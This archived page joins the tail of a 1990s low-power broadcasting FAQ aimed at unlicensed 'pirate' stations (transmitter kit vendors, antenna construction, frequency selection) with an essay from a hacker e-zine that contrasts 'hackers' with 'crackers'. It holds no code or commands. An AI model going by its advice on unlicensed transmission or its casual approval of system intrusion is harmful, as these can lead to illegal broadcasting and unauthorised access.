plus shipping). The FMO kit ($75) is a high fidelity stereo FM
transmitter kit with 2 to 20 milliwatts of output power. The FME-500,
a half-watt mono FM transmitter with excellent technical specs, can be
combined with their stereo generator to build a high-quality low power
station (> $200 for the two kits). Panaxis kits might not be suitable
for absolute beginners; you should have some experience in circuit
assembly before you tackle these.

-----

Progressive Concepts
1434 N. Mills Ave.
Claremont CA 91711

RF amplifiers, FM transmitters and stereo generators, components for RF
circuits and more.

-----

Ramsey Electronics
793 Canning Pkwy
Victor NY 14564
phone 716-924-4560

Ramsey kits have well-written instruction manuals, and most of the
circuit boards have lots of wide-open space which makes modifications
easy. The company also has a good reputation for service. On the
negative side, they only offer plastic cases for their broadcasting
kits (transmitter circuits generally perform better in metal cases).

The FM-10A is an FM stereo transmitter kit ($34.95 plus shipping) with
a few milliwatts of output power; it is based on the BA1404 integrated
circuit. The company has just introduced the FM-25 kit, which has PLL
tuning for greater frequency stability; the cost is about $129.
Unfortunately, the audio section of the FM-25 is identical to the
FM-10A; it uses a BA1404 with inadequate RF bypassing.

Their AM transmitter kit (item #AM-1, $29.95) and their TV transmitter
kit (item #TV-6, $27.95) might also be of interest; however, there is
much room for improvement in the design of these two circuits.
(Robert Myers of Ramsey Electronics tells me they do intend to release
an improved version of the AM-1 kit at some point in the future.)

-----

Scott Communications
6974 Larkspur Rd. RR-3
Sooke, B.C., Canada VOS-1NO
phone 604-642-2859
e-mail: kscott@pinc.com

This company offers a 3-watt mono FM transmitter which they say has
good sound quality and frequency stability. Kits cost $90 plus $5
shipping; fully assembled and tested $129 + $7. Their info says,
"A 1/2 wave dipole antenna and plans for a 3/4 wave antenna (3-db
gain) are included with each order... We ship right to your door by
air mail special delivery... Supply voltage 12-15 volts dc, supply
current 0.5 amps, input sensitivity 10mV-1V, input impedance 10k-100k,
freq. range 80-108Mhz, antenna feed 75ohms-RG6U, transistors 2n3553,
output power 3-watts, size 3"W 6"L 2 1/2"H." They plan to offer a
stereo transmitter with PLL frequency control soon.

-----

Supercircuits
13552 Research Blvd
Austin TX 78750

This company sells a low-power TV transmitter for channels 3 thru 6
which appears to be of high quality ($49.95 plus $4.50 S & H). For
licensed radio amateurs, they also sell some ham TV transmitter kits
with 1 to 2 watts peak output power that can be adapted for use on UHF
channels 14 thru 19, and a linear amp for boosting the output of these
transmitters.

-----

Xandi Electronics
Box 25647
Tempe AZ 85285
phone 800-336-7389 / 602-894-0992

The XFS108 kit ($41.95) is an FM stereo transmitter, probably based on
the BA1404. Their advertisements give no specifics.

-----

In a message dated Nov 08 06:01:55 EST 1994, an22190@anon.penet.fi wrote:

>There is a company called "Spectrum Communications" in Dorchester England
>that sells fm transmitters and associated gear. A transmitter tunable from
>88-108Mhz (part CTX100V) with output of 0.5Watt is available for 135 pounds.
>This unit is synthesised. ... The phone number is 0305-262250.

-----

sources of shortwave transmitters:

Shortwave pirates generally use "ham" radio gear that was designed for
licensed radio amateurs. Used vacuum-tube transmitters from the 1945
to 1975 era are sold at swapmeets and hamfests; certain types are
suitable for broadcasting music and speech. (The Viking Challenger is
especially popular for this purpose.)

------------------------------

[5] What kind of antenna should I use?

Antenna theory, design and construction is a very complex topic. If
you really want to understand antennas, I recommend that you buy a
copy of _The_ARRL_Antenna_Book_ (published by ARRL, 225 Main St.,
Newington CT 06111 USA). It is a large book and you might have to
spend several weeks studying it before it all begins to make sense.

Assuming you want to get on the air in a hurry, and then build a
better antenna system later on, I will describe the quickest and
simplest options available. The systems described here are all less
than optimum, but they will get you on the air pronto.

WARNING: There are several ways you can get killed or injured while
putting up an antenna. Never get within 10 feet of a power line, and
never mount an antenna where it could possibly fall onto a power line,
or where a power line could fall onto the antenna. Avoid falling off
of roofs and ladders. Permanent outdoor antennas must be provided with
a ground rod so that lightning, if it happens to strike, will go into
the ground instead of into your equipment and your body.

  
For FM broadcasting, try Radio Shack's omni-directional FM antenna
(catalog #15-2164, price $12.99). Don't forget the 75-to-300 ohm
impedance matching transformer (#15-1140 or 15-1143). (A 50-to-300
ohm transformer would be better, but you won't find those at Radio
Shack.) This antenna can be mounted on a typical TV antenna mast, or
a chimney, or hidden in the attic. Best results will be obtained when
it's outdoors, away from trees and other objects, and mounted several
feet higher than the rooftops in your neighborhood.

In AM broadcasting, a vertical section of TV antenna mast, 10 or 20
feet long/high, makes a decent antenna. The center conductor of the
coaxial cable from your transmitter is connected to the bottom of this
vertical mast; the base of the mast sits on an insulator which sits on
the ground. If the vertical radiator is made of several sections of
antenna mast, make sure the sections are electrically connected -- try
screwing some self-tapping sheet metal screws into the joints. The
outer conductor (shield) of the coaxial cable is connected to a set of
"ground radials," which are pieces of copper wire radiating out from
the base of the antenna like spokes from the hub of a wheel. (The
radials are not connected to the vertical radiator.) The radials can
be buried a few inches below the surface for a permanent installation.
"Beware the lawnmower."

For shortwave broadcasting, a horizontal dipole works well enough.
Cut two pieces of un-insulated copper wire; the length of each piece
will be 234 feet divided by your frequency in MHz. Example: for 7385
kHz, each element will be (234/7.385 =) 31.7 feet long, and you will
need two trees or other support structures about 63 feet apart.
Solder one element to the center conductor of your coaxial feedline,
and solder the other element to the outer conductor (shield) of the
co-ax. (Note: the solder joints cannot bear the weight of the cable;
loop the cable once over an insulator and provide some "strain
relief".) Make a little loop at the free end of one element, and tie
a long piece of string to that loop. Tie a small, heavy object (such
as a lead fishing weight) to the other end of the string. Throw the
weight up into the branches of a tree so that it goes over a branch
and comes back down to earth; then hoist up that half of your antenna.
Repeat the process for the other element.

------------------------------

[6] How do I select a frequency?

Receivers with digital tuning will only lock onto signals that are on
standard broadcast frequencies. In the US, AM stations are at 10 kHz
intervals, ranging from 540, 550, 560 ... to 1600. (Some Travellers
Information Stations are licensed on 530, 1610, and 1620. The
channels 1610 through 1700 may soon be allocated to broadcast
stations.) In some other countries, AM stations are spaced at 9 kHz
intervals. FM stations are spaced at 0.2 MHz intervals, ranging from
88.1, 88.3 ... to 107.9 MHz.

Do not use an out-of-band frequency; they are allocated to other
services. (For example, the frequencies just below 88 MHz are used for
TV broadcasts, and the frequencies just above 108 MHz are used for
aircraft communication.)

Make a survey of the band you are planning to use. Get some graph
paper or notebook paper and make a list of all the channels. Listen
during the day and at night, making a note of what station(s) you can
hear on each channel. Use a good receiver with digital tuning and a
decent antenna, not some cheap piece of junk clock-radio or dime-store
pocket radio. Repeat this band-scanning process several times during
the course of a couple of weeks. (If you really want to be thorough,
get a list of all the licensed stations in a 150-mile radius. You can
extract this data from the _Broadcasting_Yearbook_ [a trade
publication] or the FCC database [available on computer disks from
several vendors]). If you know any DXers (people who make a hobby of
listening to distant and unusual signals), ask them for a copy of
their "log."

Now, sit down with your data and search for an appropriate channel.
Don't start with any prejudices or pre-conceived notions: don't plunk
your signal onto 99.9 MHz just because you think it's cute ("666"
upside down) or onto 1000 kHz because you think it's an easy number to
remember. Don't try to wedge your signal into the non-commercial part
of the FM band (88 to 92 MHz) if there isn't an appropriate opening
there.

An appropriate channel for low power broadcasting is one that is not
occupied by a local station, or by an often-audible* distant station.
The adjacent channels -- the next channel above and the next channel
below the one you're considering -- also must not be occupied by local
stations, because they will "splatter" onto your signal (and they will
claim that you are splattering onto them).

There are a couple of other things you must keep in mind when
selecting an FM broadcast frequency. First, if there is a TV station
broadcasting on channel 6 in your area, it is unwise to operate on
88.1, 88.3, or 88.5 MHz. TV receivers have broadband tuning circuits
(a TV channel is 6 MHz wide, enough spectrum to hold 30 FM stations),
so broadcasts at the "low edge" of the FM band can easily interfere
with reception of channel 6. In some areas where the authorities have
foolishly licensed both a channel 6 and a low-edge FM station, the
stations often have to go to great lengths to deal with interference
complaints.

Another thing for FMers to consider is the mixing of signals that can
occur in a listener's receiver. Most FM radios use an intermediate
frequency of 10.7 MHz; in other words, whatever frequency you're tuned
to is converted down to 10.7 MHz before the sound waves are extracted
from the radio waves. As a result, a strong signal can interfere with
reception of stations that are on a frequency 10.6 or 10.8 MHz above
or below it.

For example, if you transmit on 92.3 MHz, some listeners who are
located near your transmitter will have trouble hearing a station on
102.9 or 103.1 MHz (92.3 + 10.7 = 103.0). The interference might take
the form of an "image" of your signal being heard on the other
frequency, or vice versa; or a mixture of the two signals might be
heard on blank spots and on top of weak signals all over the band.
Any other transmitter in your immediate neighborhood, whether it's a
cellular telephone system, an AM or FM broadcaster, or any other
service, might interact with your transmitter in unexpected,
interference-causing ways. So, do some testing with a variety of
receivers (including cheap junk) before you make a final decision on
your frequency. In many major cities where the FM band is quite
crowded, you will find a few conspicuous empty channels; in some
cases, these channels have been kept unused (or had to be evacuated)
because of interference problems caused by signals mixing together at
the transmitters or in people's receivers.

*How to define "often audible" is a matter of debate; opponents of
radio freedom say that _every_ channel is occupied by a distant
station that some DXer might be able to hear with his 50-foot
antenna tower and $1,000 radio.

------------------------------

[7] Where can I get more information?

Introductory electronics textbooks are available at most bookstores
and libraries. Magazines such as Electronics Now, Popular
Electronics, 73, QST, Communications Quarterly, and Nuts & Volts
sometimes have articles and advertisements of interest to low power
broadcasters. Monitoring Times and Popular Communications carry
relevant news items from time to time. The ACE, a monthly newsletter,
covers shortwave pirates well and occasionally contains data useful to
AM and FM broadcasters (send $2 for a sample copy to Box 11201,
Shawnee Mission KS 66207).

Keep an eye on these Usenet newsgroups:
alt.radio.pirate
rec.radio.broadcasting
rec.radio.amateur.antenna

Files of some relevance are available for ftp from these sites:

site directory filename
==== ========= ========
crl.com /users/ro/frbspd (several)

dg-rtp.dg.com /fm10 FM10-FAQ (& others)

netacsys.com /pub/micro_radio (several)

for WWW fans, here's a URL:ftp://netacsys.com/pub/web/mycal/mycal.html

----------------------------------------------------------------------
This text is copyright 1994-95 by Rick Harrison. Permission is hereby
granted for unlimited distribution of this text via Usenet newsgroups,
Internet file servers, and computer bulletin boards. Any publication
of this text in semi-permanent form (such as hardcopy or CD-ROM)
requires the author's prior permission.

--
Rick Harrison (hrick@gate.net) PO Box 54-7014, Orlando FL 32854 USA
editor, Journal of Planned Languages (visit ftp.gate.net pub/users/hrick);
author, Low Power Broadcasting FAQ (alt.radio.pirate); and sensitive poet.

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #2, File #8 of 9

The AOL Syndrome

By: Revolution


Things had been going nicely. Brinta had gotten back up, and
I'd finally been able to download the net blazer article Jojo had
been trying to get through to me for a week. I'd stumbled upon an
archaic machine that still believed in cultivating the rdist bug,
which just so happened to have a very nice list of trusting hosts.
Then I attempted to check out what was happening over on alt.2600.

Under a barage of spam from me-too@aol.com, my news reader
began to groan in dismay. I quickly dodged four cross postings of
questions on how to build a blue box, diving directly into a huge
slush of "What's the password for 127.0.0.1?" threads. After
freeing myself, my news reader was thrown into WaReZ PuppY M0De,
which I could only get out of by posting the question "Where can I
download SATAN?" fifteen thousand times. Finally my news reader
calmed down and navigated me to some readable posts.

I didn't say intelligent. I just said readable.

Apologies to the many denizens of alt.2600 who do know what
they are talking about, many much more than I. You are the reason
I follow alt.2600 so closely. Apologies also to Voyager, from me
on behalf of anyone who has ever made a post to alt.2600 without
reading the FAQ. It is one of the best kept records of hacker
knowledge on the planet.

But....

The AOL syndrome is sweeping the planet! Any who have
experienced it know exactly what I am talking about. Being a
cracker has suddenly become the coolest thing since sliced bread.
And I say cracker because no one wants to be a hacker. No one
wants to spend twelve hours dialing 800 numbers by hand, or monthes
on end learning Unix. These new crackers want SATAN, they want the
hackers handbook, they want warez sites, they want to learn the
password that will let them into any system.

Instant gratification has come to cyberspace.

On every BBS I frequent, on many usenet groups I read, I see
many of the same symptoms. People think it would be cool to be
able to break into every system on the internet, to see people's
credit histories, to change people's phone numbers. They want to
be able to do it, and they want to be able to do it right now.
They want to be crackers. Breaking into systems for the sake of
breaking into systems. But being a cracker is easy. It takes no
skill what so ever.

How many of us, on the other hand, would like to be hackers?
Being a hacker demands much more of a person; you might say, on the
one hand, crakers can be made. Anyone can commit credit card
fraud, anyone can hack a pbx, anyone can break into a few sites.
Hackers, on the other hand, are born. There is a certain quality
in some people, a certain drive, an obsession to know. A need to
know, a need to obtain information. Some people follow it to
fortunes, some follow it to jail cells, but in all it is basically
the same. There is no glory for most; no newspaper articles, no
fame, but they have other reasons for what they do. Because they
enjoy it. They enjoy finding things out for themselves.

Why am I rambling on about all of this? Because hacking
should be more than cracking; it should be more than instant
gratification. If you can't hack a system, is it more educational
and reflective of your hacker talent to ask someone else for step
by step instructions of how to get in, or to try and get in for
yourself? No matter how long and tedious it might be, isn't it a
bit more fun, and really what hacking is all about?

In many of us, I fear, the AOL syndrome will prove to be
terminal. Once it is realized that there isn't an easy way to hack
into every system, that you can't get free phone calls just because
you can spell it fone, many would-be hackers will bite the dust.

But as long as there are computers and networks to explore,
there will be those who enjoy exploring them for freedom's sake,
not for what others think of them because they are able to crack.

There will always be hackers.

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #2, File #9 of 9

The End


I know what you're thinking. You're thinking I could have
written an article for that magazine, I just never got around to
it. Well get around to it! We need submissions to keep going. My
email address is scanlonr@delphi.com, or you can reach me as
Revolution on Brinta, ISCA, Monolith, Thanatos, Merski's Den, and
Shadow, or as Mike Scanlon at 1-518-279-1594, and, actually, I'm
going away to college so I don't even know my own address any more!
Hell, if you're in Newark stop by the NJIT campus, I'm the white
kid with the bald head who looks lost.
And where ever you hack, may the ethic be with you...


"It's better to ask forgiveness than it is to get permission."
-Grace Hopper


"Due to recent security violations, all employees must wear their
badges at all times. If you request to see someone's badge but are
refused, call 1-800-9X-SECUR."
-NYNEX Newsletter

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT